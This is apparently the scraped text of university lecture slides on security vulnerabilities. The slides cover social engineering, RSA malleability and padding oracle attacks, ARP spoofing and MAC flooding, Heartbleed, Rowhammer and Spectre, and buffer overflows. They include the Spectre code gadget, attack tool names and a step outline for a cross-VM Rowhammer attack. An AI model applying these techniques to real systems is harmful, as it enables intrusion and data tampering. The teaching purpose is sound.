![Page 1: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/1.jpg)
Security Vulnerabilities 2The devil is in the details
![Page 2: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/2.jpg)
Security Vulnerabilities
![Page 3: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/3.jpg)
Social Engineering
![Page 4: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/4.jpg)
The Human Factor
“To gain some advantage through human manipulation”
Typically it’s to obtain confidential information
● Passwords
● Financial data
● Confidential company data
Other instances
● Steal money
● Install malware
![Page 5: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/5.jpg)
Common Examples
Phishing: mass attacks to steal some
information.
Spear Phishing: email is used to carry out
targeted attacks.
Baiting: promising victims a reward.
Tailgating: relies on human trust to give the
criminal physical access to a secure building
or area.
![Page 6: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/6.jpg)
The Security Questions
Believe it or not, it is not difficult to guess your
“secret” questions from an online account
● What’s your first pet
● Where were you born
● What’s your high school mascot
● What is your mother’s maiden name
● Add questions it’s better, but not foolproof
![Page 7: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/7.jpg)
Consequences
![Page 8: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/8.jpg)
Authentication Based Attacks
![Page 9: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/9.jpg)
Factors of Identification
![Page 10: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/10.jpg)
Threats to “something you know”
● Password authentication
○ Phishing
○ Poor password management
○ Key logging
○ Other eavesdropping
● Password based attacks
○ Password cracking
![Page 11: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/11.jpg)
Threats to “something you have”
● Very few
● Usually protected with a chip
○ However, RFID copying
● Magnetic copying
![Page 12: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/12.jpg)
Threats to “something you are”
● Some say the industry just isn’t there yet
● Many “facial recognition” systems are
fooled with a print out of your face
● False positives and false negatives
![Page 13: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/13.jpg)
Crypto (in-)securities
![Page 14: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/14.jpg)
Side Channel Attacks
● We can try to attack the mathematical foundation of a cryptosystem
● If that doesn’t work, we can try to attack the implementation
![Page 15: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/15.jpg)
A parity problem
● We only want to sell even number of eggs
● We want to use RSA to protect the orders
(very sensitive information)
![Page 16: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/16.jpg)
![Page 17: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/17.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
n = 15 (p = 3, q = 5)
![Page 18: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/18.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
enc(m)
ok
![Page 19: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/19.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
![Page 20: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/20.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
enc(2·m)
ok
Adaptive Ciphertext Attack
![Page 21: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/21.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
enc(2·m)
ok
![Page 22: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/22.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
![Page 23: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/23.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
enc(4·m)
err
![Page 24: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/24.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
![Page 25: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/25.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
enc(8·m)
ok
![Page 26: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/26.jpg)
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
![Page 27: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/27.jpg)
How can we change the message?
![Page 28: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/28.jpg)
Multiplicative Property of RSA
![Page 29: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/29.jpg)
Can we only hack farms?
![Page 30: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/30.jpg)
PKCS#1 v1.5
0002 RANDOM PAD 00 MESSAGE
Broken by Bleichenbacher Attack (1998)
![Page 31: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/31.jpg)
Electronic Codebook
![Page 32: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/32.jpg)
ECB CBC
![Page 33: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/33.jpg)
Cipher Block Chaining
![Page 34: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/34.jpg)
![Page 35: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/35.jpg)
Padding Oracle Attackhttps://www.infobytesec.com/down/paddingoracle_openjam.pdf
![Page 36: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/36.jpg)
![Page 37: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/37.jpg)
Timing Attack
![Page 38: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/38.jpg)
![Page 39: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/39.jpg)
"Never ever implementyour own cryptosystem"
( Dan Boneh )
![Page 40: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/40.jpg)
![Page 41: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/41.jpg)
Network Security
![Page 42: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/42.jpg)
Network Sniffing● Technique at the basis of many attacks● The attacker sets his/her network interface in promiscuous mode● Many protocols (FTP, POP, HTTP, IMAP) transfer information in clear● Tools to collect, analyze, and reply traffic● Routinely used for traffic analysis and troubleshooting● Command line-tools:
○ tcpdump: collects traffic○ tcpflow: reassembles TCP flows○ tcpreplay: re-sends recorded traffic
● GUI tools:○ Wireshark
■ Providers parsers for many protocols
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 43: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/43.jpg)
Network Sniffing
![Page 44: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/44.jpg)
SpoofingARP spoofing
● The attacker sends wrong ARP replies to set himself as the other party● Sniff all traffic between two host (man-in-the-middle)● Tools:
○ Dsniff○ Ettercap
IP Spoofing
● Forge a packet with the source IP address spoofed
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 45: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/45.jpg)
Man In The Middle Attack
There is nothing here.. sorryBut if you reached here send an email to [email protected]
![Page 46: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/46.jpg)
Man In The Middle Attack
![Page 47: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/47.jpg)
Switched Environments● Switched Ethernet does not allow direct sniffing
● MAC flooding
○ MAC address / port mappings
○ In some cases, flooding the switch with bogus MAC address will overflow the table’s memory and revert from switch to hub
● MAC duplicating / cloning
○ Attacker configures her host to have the same MAC
○ The traffic is duplicated
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 48: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/48.jpg)
Defenses● Static ARP entries
● Ignore unsolicited ARP replies
● Monitor changes (arpwatch)
● Firewalls
● HTTPS
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 49: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/49.jpg)
Network Protocols Vulnerabilities
![Page 51: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/51.jpg)
![Page 52: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/52.jpg)
SMURF (amplification attack)broadcast ping with spoofed source
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 53: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/53.jpg)
![Page 54: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/54.jpg)
Networking Libraries and ToolsLibpcap
● Sniff traffic
Libnet
● Forge and inject traffic
Scapy
● Python library to do everything
Nmap
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 55: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/55.jpg)
Heartbleed (CVE-2014-0160)
![Page 56: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/56.jpg)
https://xkcd.com/1354
![Page 57: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/57.jpg)
https://xkcd.com/1354
![Page 58: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/58.jpg)
https://xkcd.com/1354
![Page 59: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/59.jpg)
https://xkcd.com/1354
![Page 60: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/60.jpg)
https://xkcd.com/1354
![Page 61: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/61.jpg)
https://xkcd.com/1354
![Page 62: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/62.jpg)
Hardware Vulnerabilities
![Page 63: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/63.jpg)
![Page 64: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/64.jpg)
![Page 65: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/65.jpg)
RowhammerRAM is made of rows of cells periodically refreshed.
When the CPU requests a read/write operation on a byte of memory, the data is first transferred to the row-buffer (discharging).
After performing the requested operation, the content of the row-buffer is copied back to the original row (recharging).
Frequent row activation (discharging and recharging) can cause bit-flips in adjacent memory rows.
https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
![Page 66: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/66.jpg)
Rowhammer (+ Android = Drammer)● VUSec (Amsterdam)
showed that it is possible to deterministically decide where to put a kernel page using Android APIs
● Then it is possible to perform a bit-flip to get write access to a kernel page (and gain root)
https://www.vusec.net/projects/drammer/
![Page 67: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/67.jpg)
Rowhammer (+ cloud + deduplication = oh no..)
1. Hammer the memory from attacker VM to find a bit-flipping row.
2. Load target file in memory page vulnerable to a bit-flip.
3. Load target file in the victim VM.
4. Wait for KSM to merge the two pages.
5. Hammer again.
6. The file in the victim VM should have been modified.
https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
![Page 68: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/68.jpg)
Spectre (CVE-2017-5753 and CVE-2017-5715)
![Page 69: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/69.jpg)
Speculative Execution
Speculative execution is an optimization technique where a computer system performs some task that may not be needed.
Work is done before it is known whether it is actually needed, so as to prevent a delay that would have to be incurred by doing the work after it is known that it is needed.
![Page 70: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/70.jpg)
Cache Side Channel
● The attacker has control over what is cached (by pruning the cache)
● By measuring the time to access a piece of data, it is possible to determine if the data was in cache or not.
● What if we are able to cache something we should not have access to?
https://spectreattack.com/spectre.pdf
![Page 71: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/71.jpg)
How does Spectre workif (x < array1_size) { y = array2[array1[x] * 4096];}
● The attacker controls x.
● array1_size is not cached.
● array1 is cached.
● The CPU guesses that x is less than array1_size.
3 8 1
array2
array1
https://spectreattack.com/spectre.pdf
![Page 72: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/72.jpg)
How does Spectre workif (x < array1_size) { y = array2[array1[x] * 4096];}
● The CPU executes the body of the if statement while it is waiting for array1_size to load.
● The attacker can then determine the actual value of array1[x]
3 8 1
array2
array1
https://spectreattack.com/spectre.pdf
![Page 73: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/73.jpg)
Application Vulnerabilities
![Page 74: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/74.jpg)
Design Vulnerabilities● Intrinsic in the overall logic of the application
○ Lack of authentication and/or authorization checks
○ Erroneous trust assumptions
● These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application
● (An automatic exploit tool should automatically understand what the application does - halting problem)
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 75: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/75.jpg)
Implementation VulnerabilitiesThese vulnerabilities are introduced because the application is not able to correctly handle unexpected events
● Unexpected input
● error/exception
● Unfiltered output
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 76: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/76.jpg)
Local Attacks vs Remote AttacksLocal attacks
● Allow one to manipulate the behavior of the application through local interaction
○ Requires a previously established presence on the host
● Allow one to execute operations with privileges that are different from the ones the attacker would have
● In general, easier to perform, because we already have access to the machine
Remote attacks
● Allow one to manipulate an application through network-based interaction
● Allow one to execute operations with the privilege of the vulnerable application
● In general more difficult to carry out because we don’t have already a user on the machine
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 77: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/77.jpg)
How to make an application misbehaveWe want to manipulate the instruction pointer (program counter, IP) to point to code that we want.
How?
● Buffer overflow
● Format string exception
● PLT and GOT (dynamically linked libraries)
● … many others (use-after-free, dirty cow, …)
![Page 78: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/78.jpg)
Buffer Overflow
https://security.stackexchange.com/questions/135786
![Page 79: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/79.jpg)
Buffer Overflow Defenses (Stack Canaries)
http://www.cbi.umn.edu/securitywiki/CBI_ComputerSecurity/MechanismCanary.html
![Page 80: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/80.jpg)
Buffer Overflow Defenses (Stack Canaries)
http://www.cbi.umn.edu/securitywiki/CBI_ComputerSecurity/MechanismCanary.html
![Page 81: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/81.jpg)
Buffer Overflow Defenses (Stack Canaries)
